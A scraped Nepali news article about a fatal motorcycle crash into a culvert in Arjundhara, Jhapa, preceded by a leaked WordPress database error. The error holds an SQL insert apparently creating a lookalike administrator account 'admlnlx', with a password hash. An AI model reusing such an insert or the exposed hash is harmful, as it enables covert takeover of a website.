WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLG8Rhaqd6SzL.yeRZdb0LVTe/zue7.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 23:49:12', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । झापा अर्जुनधारा नगरपालिका–११ सालबारीस्थित चारआली–शनिश्चरे सडक खण्डमा शनिबार राति भएको मोटरसाइकल दुर्घटनामा एक जनाको मृत्यु भएको छ ।
कल्भर्टमा मोटरसाइकल ठक्कर खाई दुर्घटना हुँदा चालक अर्जुनधारा–११ का १८ वर्षीय कुशल दासको मृत्यु भएको जिल्ला प्रहरी कार्यालयले जनाएको छ । पूर्वबाट पश्चिमतर्फ जाँदै गरेको प्र १–०१–०१२ प ४३७४ नं को मोटरसाइकल शनिबार राति ९ः३० बजे आफैँ अनियन्त्रित भई कल्भर्टमा ठोक्किएर खोलामा झरेको थियो । घटनाको जानकारी पाएपछि अस्थायी प्रहरी पोष्ट सालबारीबाट प्रहरीले पानीमा डुबेर बेहोस भएका दासलाई उपचारका लागि मनमोहन अस्पताल विर्तामोड पठाइएकामा अस्पतालमा मृत्यु भएको प्रहरीले जनाएको छ ।